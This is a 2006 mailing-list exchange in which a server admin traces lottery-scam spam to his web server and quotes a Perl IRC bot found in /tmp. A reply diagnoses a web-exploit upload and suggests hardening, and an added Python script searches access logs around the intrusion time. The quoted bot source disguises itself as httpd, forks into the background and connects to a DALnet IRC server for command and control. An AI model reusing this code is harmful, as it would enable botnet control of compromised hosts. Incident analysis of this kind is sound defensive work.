Postfix Problems

Paul Howarth paul at city-fan.org
Tue May 23 12:11:46 UTC 2006


CodeHeads wrote:
>> There is something wrong but I cannot nail it down.
>>
>> I am receiving hundreds of bounce backs from the web server I am running.  Not
>> sure how they are sending mail.  The only mail that should be sent is from
>> forms.  Here is a header of one of queues.  Maybe someone has run into this.
>>
>> V8
>> T1147739033
>> K1147739138
>> N1
>> P34672
>> Mhost map: lookup (zdnetmail.com): deferred
>> F8bs
>> $_apache at localhost
>> ${daemon_flags}c u
>> Sapache
>> Aapache at code-heads.com
>> rRFC822; galactica7 at zdnetmail.com
>> RPFD:galactica7 at zdnetmail.com
>> H?P?Return-Path: <<81>g>
>> H??Received: (from apache at localhost)
>>         by code-heads.com (8.13.4/8.13.4/Submit) id k4G0NrpQ017524;
>>         Mon, 15 May 2006 20:23:53 -0400
>> H?D?Date: Mon, 15 May 2006 20:23:53 -0400
>> H?x?Full-Name: Apache
>> H?M?Message-Id: <200605160023.k4G0NrpQ017524 at code-heads.com>
>> H??To: galactica7 at zdnetmail.com
>> H??Subject: WINNING NOTIFICATION
>> H??From: NATIONAL LOTTERY <claimsagent_2006_2007 at yahoo.co.uk>
>>
>> What is bothering me is this:
>> by code-heads.com (8.13.4/8.13.4/**Submit**) id k4G0NrpQ017524;

Right, that should tell you that the mail headers you are looking at 
seem to be generated by something running as user apache (probably a 
CGI/PHP script of some kind running via your web server), which is 
calling the local sendmail on that server to send the mail out. It's 
nothing to do with postfix at all.

> Sorry again, but looky what I found in the /tmp dir:
> The whole thing is not copy and pasted:
> #!/usr/bin/perl
> # r00t teh pl4net! gr33t t0 Myhack at DALnet
> # ------[eof]-----
> 
> 
> 
> system("kill -9 `ps ax |grep /var/tmp/wops/is |grep -v grep|awk '{print
> $1;}'`");
> 
> 
> my $processo = 'httpd';
> 
> # morgan the code that you need to rip ends here
> 
> my @titi = ("Cube-|");
> 
> my $sleep='5';
> my $linas_max='4';
> my @adms=("apaii","KingFighter");
> my @hostauth=("roundtable.cif.rochester.edu","202.142.215.209");
> my @canais=("#conn");
> my $nick=  $titi[rand scalar @titi];
> my $ircname =  $titi[rand scalar @titi];
> chop (my $realname = $titi[rand scalar @titi]);
> 
> $servidor='rumble.dal.net' unless $servidor;
> my $porta='6667';
> my $VERSAO = '0.5';
> $SIG{'INT'} = 'IGNORE';
> $SIG{'HUP'} = 'IGNORE';
> $SIG{'TERM'} = 'IGNORE';
> $SIG{'CHLD'} = 'IGNORE';
> $SIG{'PS'} = 'IGNORE';
> use IO::Socket;
> use Socket;
> use IO::Select;
> chdir("/");
> $servidor="$ARGV[0]" if $ARGV[0];
> $0="$processo"."\0"x16;;
> my $pid=fork;
> exit if $pid;
> die "Problema com o fork: $!" unless defined($pid);
> 
> our %irc_servers;
> our %DCC;
> my $dcc_sel = new IO::Select->new();
> 
> $sel_cliente = IO::Select->new();
> sub sendraw {
>   if ($#_ == '1') {
>     my $socket = $_[0];
>     print $socket "$_[1]\n";
>   } else {
>       print $IRC_cur_socket "$_[0]\n";
>   }
> }
> 
> sub conectar {
>    my $meunick = $_[0];
>    my $servidor_con = $_[1];
>    my $porta_con = $_[2];
> 
>    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp",
> PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1); if
> (defined($IRC_socket)) { $IRC_cur_socket = $IRC_socket;
> 
> What I cannot understand is how someone can upload to the tmp dir.  I guess I
> am still learning.  Can someone shed some light on this?

This is communicating with an IRC server, probably to listen for commands.

Look at the owner of the script. If it's apache, you can safely say that 
a webserver exploit was used to upload it. You could try looking at the 
timestamp of the file, and look in your web server log files for 
suspicious activity at around that time to get a clue as to how it got 
there.

If you have /tmp on a separate partition, I'd seriously consider 
mounting it noexec,nodev. If it's not a separate partition, I'd 
seriously consider making one for it on an Internet-exposed web server. 
Same goes for /var.

Paul.
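Paul's triage steps (check the file's owner and timestamp, then look at the web server log around that time) as an added Python example; this is not part of the original thread. The Apache combined-log regex, the client addresses and the log lines are constructed for the example, and the pivot time is the one in the Received: header quoted above.

```python
import os
import pwd
import re
from collections import Counter
from datetime import datetime, timedelta

# Apache/httpd "combined" access-log line (constructed regex, not from the page).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) ')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"  # e.g. 15/May/2006:20:23:53 -0400

def file_pivot(path):
    """Owner and timezone-aware mtime of the suspicious file (the two starting points in the reply)."""
    st = os.stat(path)
    return pwd.getpwuid(st.st_uid).pw_name, datetime.fromtimestamp(st.st_mtime).astimezone()

def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m.group("ip"), "ts": datetime.strptime(m.group("ts"), TS_FMT),
            "req": m.group("req"), "status": int(m.group("status"))}

def requests_around(lines, pivot, window=timedelta(minutes=10)):
    """Entries whose timestamp lies within +/-window of pivot, oldest first."""
    hits = [e for e in map(parse_line, lines) if e and abs(e["ts"] - pivot) <= window]
    return sorted(hits, key=lambda e: e["ts"])

def sources(hits):
    """Requests per client IP inside the window; one client doing most of them is worth a closer look."""
    return Counter(e["ip"] for e in hits)

# Constructed sample data; the pivot is the time from the thread's Received: header.
PIVOT = datetime.strptime("15/May/2006:20:23:53 -0400", TS_FMT)
SAMPLE_LOG = [
    '203.0.113.5 - - [15/May/2006:18:05:00 -0400] "GET / HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [15/May/2006:20:13:00 -0400] "GET /forms/ HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [15/May/2006:20:21:40 -0400] "GET /forms/contact.php HTTP/1.1" 200 3310 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [15/May/2006:20:23:12 -0400] "POST /forms/contact.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [15/May/2006:20:30:59 -0400] "GET /index.html HTTP/1.1" 404 298 "-" "curl/7.15"',
    "not a log line",
]

if __name__ == "__main__":
    hits = requests_around(SAMPLE_LOG, PIVOT)
    for e in hits:
        print(e["ts"].isoformat(), e["ip"], e["status"], e["req"])
    print(sources(hits))
```

On a real host, replace PIVOT with the mtime returned by file_pivot() and feed it the access log lines; the 20:13:00 entry in the sample falls 653 seconds before the pivot and is correctly left outside the ten-minute window.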



